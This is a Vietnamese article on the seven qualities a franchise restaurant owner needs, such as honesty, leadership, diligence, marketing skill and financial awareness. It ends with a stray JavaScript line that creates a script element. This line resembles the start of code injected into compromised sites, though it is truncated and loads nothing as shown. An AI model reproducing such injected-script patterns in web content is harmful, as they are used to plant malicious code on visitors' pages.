Chắc hẳn trong chúng ta ai cũng hiểu rõ rằng, hình thức nhượng quyền thương hiệu đã và đang là một phương thức kinh doanh ít rủi ro, lãi suất cao và là cách nhanh nhất thực hiện hóa giấc mơ trở thành ông chủ nhà hàng của bất cứ ai. Tất nhiên, bỏ qua những điều đó, đối mặt với những thử thách, nguồn vốn ban đầu của việc nhượng quyền đòi hỏi, thì đây chính là một quyết định lớn.
Bắt đầu với một lĩnh vực mới mẻ luôn đầy rẫy những trở ngại và bạn cũng cần biết một điều rằng, lãnh đạo hay trở thành ông chủ đôi khi là một thiên phú và hành trình dài phấn đấu, chứ không phải là một điều hiển nhiên dành cho bất cứ ai. Nếu bạn không nắm chắc trong tay một trong những nhân tố nhất định quyết định sự thành công thì dù bạn có sở hữu một thương hiệu đình đám đến đâu thì chi nhánh của riêng bạn cũng không thể thành công. Hãy nắm chắc một vài lợi thế mà bạn có thể đạt được nếu bắt đầu với lĩnh vực này, nếu không thì hãy bắt tay vào lĩnh vực khác. Chắc chắn chân lý này sẽ không thay đổi, bởi bạn nên nhớ rằng dù là nhượng quyền thì cũng cần cá nhân đó phải có vốn đầu tư, năng lực để tự điều hành và mở một nhà hàng của riêng mình.
Dựa vào nghiên cứu chuyên sâu về lĩnh vực nhượng quyền thương hiệu, chúng tôi nhận ra rằng, đại đa số những cá nhân, ông chủ có 7 đặc tính sau sẽ đưa thương hiệu của mình tiến xa hơn nữa. Vậy hãy cân nhắc xem bản thân bạn có 7 yếu tố sau không nhé:
-
Trung thực
Nếu bạn là một doanh nghiệp nhượng quyền, hãy nhớ rằng bạn đã và đang dành nhiều thời gian, tiền bạc, tâm huyết, công sức cho việc phát triển một thương hiệu cụ thể. Do đó, bạn cần chung sức để chứng minh với khách hàng rằng thương hiệu đó đáng tin tưởng và đặc biệt chi nhánh nhượng quyền của bạn có độ tin cậy cao, giữ vững độ nhận diện mà thương hiệu bạn nhượng quyền đã phấn đấu trong suốt những năm qua.
-
Có khả năng lãnh đạo
Bạn có sở hữu năng lực quản lý, điều hành một doanh nghiệp? Dù là một doanh nghiệp nhượng quyền, nhưng bạn vẫn cần quản lý tốt đội ngũ nhân viên hiệu quả, đồng thời hướng họ hòa nhập với môi trường, tác phong làm việc của thương hiệu gốc. Điều này có nghĩa là bạn nên tập trung, phát triển những kỹ năng lãnh đạo, khả năng giải quyết công việc độc lập cũng như có một tầm nhìn chính xác giúp bạn trở thành một nhà lãnh đạo hữu ích cho một doanh nghiệp. Bởi bạn sẽ chính là người phải giải quyết với mọi tầng lớp lao động từ đại diện thương hiệu, nhà đầu tư, nhà cung cấp, khách hàng cho tới nhân viên.
-
Đưa ra quyết định chính xác, nhạy bén
Với cương vị là một nhà nhượng quyền thương hiệu, bạn có chức trách phải đưa ra những quyết định cứng rắn, chính xác giúp doanh nghiệp phát triển trong thời gian dài. Điều này đồng nghĩa với việc bạn cần có khả năng phân biệt tốt, xấu, lợi, hại và có thể sẽ phải đối mặt với những phản đối, ý kiến trái chiều trong một thời gian dài. Điều quan trọng là bạn cần tỉnh táo, tự tin và sáng suốt.
-
Sẵn sàng học hỏi
Nếu bạn là một “lính mới” bạn vẫn hoàn toàn có thể thành công dưới cương vị là một đơn vị nhượng quyền thương hiệu nếu bạn sẵn sàng học hỏi. Nghiên cứu kỹ lưỡng các tình huống, khía cạnh của thương hiệu trước khi đưa ra quyết định sẽ là điều vô cùng cần thiết với bạn. Tìm kiếm những bài báo, câu chuyện thành công của những chuỗi thương hiệu nổi tiếng, ghi nhận, học tập và suy nghĩ kỹ lưỡng nhất có thể trước khi đầu tư một khoản tiền lớn để bắt đầu với lĩnh vực này.
-
Chăm chỉ
Không chỉ riêng việc làm chủ một thương hiệu nhượng quyền, mà đối với bất kỳ công việc nào, yếu tố chăm chỉ đều vô cùng cần thiết. Tuy nhiên, trước khi bắt đầu với lĩnh vực nhượng quyền bạn cần biết rằng, rất có thể bạn sẽ phải dành toàn bộ thời gian, tâm trí của mình cho công việc này, không quản ngày, đêm, ngày cuối tuần, nghỉ lễ hay bất cứ ngày nào trong năm. Bởi tính chất của ngành dịch vụ chính là vậy, bạn cần sẵn sàng tâm lý phục vụ “ thượng đế” bất cứ lúc nào nếu bạn thật sự muốn thành công.
-
Có khả năng trong việc phát triển mạng lưới thị trường hay marketing
Nếu chưa có kinh nghiệm bạn có thể theo chân những thành viên kỳ cựu trong ngành để tìm hiểu thêm về cách thức phát triển cộng đồng của một doanh nghiệp. Từ cách thanhf lập websites, fanpage, group Facebook, tài khoản Instgram, Pinterest cho đến tất tần tật những thứ liên quan tới mạng xã hội khác.
Nhìn chung, bạn cần có một kế hoạch rõ ràng về các chiến dịch marketing, xây dựng hệ thống khách hàng cốt lỗi, đồng thười phát triển danh sách đó ngày một lớn mạnh.
-
Nhận thức tài chính rõ ràng
Tất nhiên bạn cần có một chuyên gia tài chính, kế toán giúp đỡ công việc quản lý doanh thu hệ thống, tuy nhiên, một ông chủ đúng nghĩa cần hiểu rõ cách quản lý dòng tiền, đặc biệt là mức độ kiểm soát cũng như chi phí trong những năm đầu tiên định hình thương hiệu.
Nếu bạn sở hữu toàn bộ những phẩm chất trên đây, cùng với một niềm đam mê bất tận với một sản phẩm, mặt hàng, loại hình kinh doanh cụ thể nào, đừng ngần ngại hãy ngay lập tức bắt tay vào công cuộc chinh phúc giấc mơ của mình.
var d=document;var s=d.createElement(‘script’);